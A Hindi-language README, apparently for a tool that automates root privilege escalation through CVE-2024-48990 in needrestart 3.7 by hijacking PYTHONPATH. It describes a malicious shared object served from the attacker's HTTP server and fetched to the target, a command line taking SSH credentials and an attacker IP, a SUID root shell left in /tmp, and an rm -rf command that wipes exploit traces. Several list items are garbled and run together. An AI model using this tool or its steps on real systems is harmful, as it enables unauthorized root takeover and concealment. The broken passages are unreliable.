
CVE-2024-48990 (needrestart v3.7) के लिए स्वचालित स्थानीय विशेषाधिकार वृद्धि शोषण, PYTHONPATH अपहरण का लाभ उठाकर रूट पहुंच प्राप्त करने के लिए।
यह उपकरण needrestart संस्करण 3.7 में एक विशेषाधिकार वृद्धि भेद्यता के शोषण को स्वचालित करता है, जिसे CVE-2024-48990 के रूप में पहचाना गया है।
यह needrestart द्वारा Python प्रक्रियाओं को स्कैन करते समय PYTHONPATH पर्यावरण चर के असुरक्षित उपयोग का लाभ उठाकर रूट निष्पादन प्राप्त करता है।
शोषण इस प्रकार काम करता है:
__init__.so) संकलित करना जो आयात पर ट्रिगर होता है।.so की सेवा करना।PYTHONPATH पर्यावरण तैयार करना।importlib आयात करती है।needrestart चलाना, जो हेरफेर किए गए PYTHONPATH को प्राप्त करता है, दुर्भावनापूर्ण मॉड्यूल लोड करता है, और पेलोड को रूट के रूप में निष्पादित करता है।/tmp/poc) बनाता है, जो रूट शेल एक्सेस की अनुमति देता है।अपने हमलावर मशीन से शोषण चलाएँ:
python3 exploit.py --user <ssh_user> --host <target_ip> --att-ip <attacker_ip> --ssh-pass <ssh_password>
पैरामीटर:
needrestart संस्करण 3.7लक्ष्य से शोषण के निशान हटाने के लिए:
rm -rf /tmp/malicious /tmp/poc /tmp/exploit.sh
pexpect (pip3 install pexpect)gcc (पेलोड संकलित करने के लिए)python3 -m http.server (स्क्रिप्ट द्वारा स्वचालित रूप से शुरू)needrestart का एक भेद्य संस्करण (v3.7)/usr/sbin/needrestart के लिए sudo NOPASSWD अधिकारों वाला एक गैर-रूट उपयोगकर्ताcurl स्थापितयह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। इसे उन प्रणालियों पर उपयोग न करें जिनके आप स्वामी नहीं हैं या स्पष्ट अनुमति के बिना।